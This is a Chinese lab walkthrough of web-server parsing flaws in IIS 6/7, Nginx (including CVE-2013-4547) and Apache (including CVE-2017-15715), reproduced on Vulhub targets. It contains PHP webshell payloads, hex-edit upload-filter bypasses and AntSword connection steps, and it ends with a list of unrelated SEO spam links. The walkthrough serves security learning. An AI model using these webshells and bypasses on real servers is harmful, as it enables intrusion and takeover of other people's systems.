当前位置: 首页 > wzjs >正文

广州建站服务seo服务外包客服

广州建站服务,seo服务外包客服,渝快办重庆市网上办事大厅,优惠券小程序源码IIS解析漏洞 环境安装 windows2003iis6 IIS6.X ⽬录解析 在iis6.x中&#xff0c;.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。 在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 在x.asp中新建⼀个png⽂件。内容为<%now()%> asp代码。 外部浏览器中访问windows2003的i…

IIS解析漏洞

环境安装
windows2003+iis6

IIS6.X

⽬录解析

在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。

在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件

在x.asp中新建⼀个png⽂件。内容为<%=now()%> asp代码。

外部浏览器中访问windows2003的iis⽹站中的1.png 发现asp代码被执⾏
将1.png⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏

畸形⽂件解析

在IIS 6 处理⽂件解析时, 分号可以起到截断的效果。
333.asa;.jpg会被服务器看成是333.asa

IIS7.X

在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg 后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件
利⽤条件
1. php.ini⾥的cgi.fix_pathinfo=1 开启
2. IIS7在Fast-CGI运⾏模式下
安装PHPstudy for IIS
Windows版phpstudy下载 - 小皮面板(phpstudy)
打开电脑iis和cgi
将php.ini⾥的cgi.fix_pathinfo=1 开启
IIS7在Fast-CGI运⾏模式下
访问网页

Nginx解析漏洞

nginx_parsing

1.进⼊以下Vulhub路径并开启容器

cd /nginx/nginx_parsing_vulnerability
docker-compose up -d

2.浏览器中访问⽹站

3.制作图⽚⻢并进⾏上传

4.利用nginx解析漏洞,访问路径

5.运用蚁剑连接

CVE-2013-4547

1.使⽤以下命令启动靶机

cd vulhub-master/nginx/CVE-2013-4547x // 切换到靶机⽬录
docker-compose up -d // 打开环境

2.浏览器访问网站

上传文件内容为“<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

直接上传 shell.php 被拦截,修改⽂件后缀为.jpg进⾏上传且在后⾯添加空格,上传成功

运用bp进行抓包处理

在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20
0x20 修改为如下即 0x20 0x00 进⾏发包
访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 0x20 0x00

访问生成的木马文件

3.用蚁剑连接

Apache解析漏洞

apache_parsing

1.进⼊Vulhub靶场并执⾏以下命令启动靶场

cd / vulhub / httpd / apache_parsing_vulnerability
docker - compose up - d

2.访问靶机并上传 shell.php.jpg ⽂件,⽂件内容为

<?php fputs(fopen("666.php","w"),'<?php eval($_POST["cmd"]);?>')?>

3.运用蚁剑连接

CVE-2017-15715

1.进⼊Vulhub靶场并开启⽬标靶机,进⾏访问

# 启动靶机
cd / Vulnhub / vulhub - master / httpd / CVE - 2017 - 15715
docker - compose up - d

2.尝试上传⼀句话⽊⻢⽂件,发现被拦截,在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功

3.访问上传的evil⽂件在后⾯加上 %0a 再访问

4.运用蚁剑连接

http://www.dtcms.com/wzjs/398909.html

相关文章:

  • 深圳响应式建站百度直播推广
  • 适用的深圳网站定制开发网站权重划分
  • 广州网站建设费核心关键词是什么意思
  • 企业网站mp4怎么处理信息流优化师面试常见问题
  • 品牌网站建设预算百度站长收录入口
  • 现在建设公司网站用什么软件杭州搜索推广公司
  • 互联网科技公司做网站哪家好搭建一个app平台需要多少钱
  • 自助建网站最近10条重大新闻
  • 网站设计纠纷东莞企业网站推广
  • 网络服务器销售商搜索引擎网站优化推广
  • 邢台做网站建设公司哪家好?seo搜索引擎优化方法
  • phpok做网站教程宁波正规优化seo公司
  • 网站怎么做能提升ip流量网站关键词有哪些
  • 制作百度移动网站模板免费下载北京网站维护公司
  • 网站开发需求模板济宁seo推广
  • jsp网站开发详解下载深圳全网营销型网站
  • wordpress网站设置关键词品牌推广策划书范文案例
  • 企业网站的主要功能板块谷歌seo搜索引擎
  • 怎么做素材网站站长工具综合查询系统
  • 网站安全建设目的是网络热词2023流行语及解释
  • 网站建设行业发展方向discuz论坛seo设置
  • 自己电脑做网站 外网无法访问百度不让访问危险网站怎么办
  • 网站建设都包括哪些方面网站建设的流程是什么
  • 深圳做网站佰达科技二十七成年培训班有哪些
  • php网站开发专业背景搜索seo
  • 建设银行余额查询网站快手seo软件下载
  • 做网站用源码建网站怎么建
  • 郑州网站推建设站长工具国产
  • 优秀网站建设方案搜索引擎推广和优化方案
  • 自己做的网站可以用于百度推广吗域名备案查询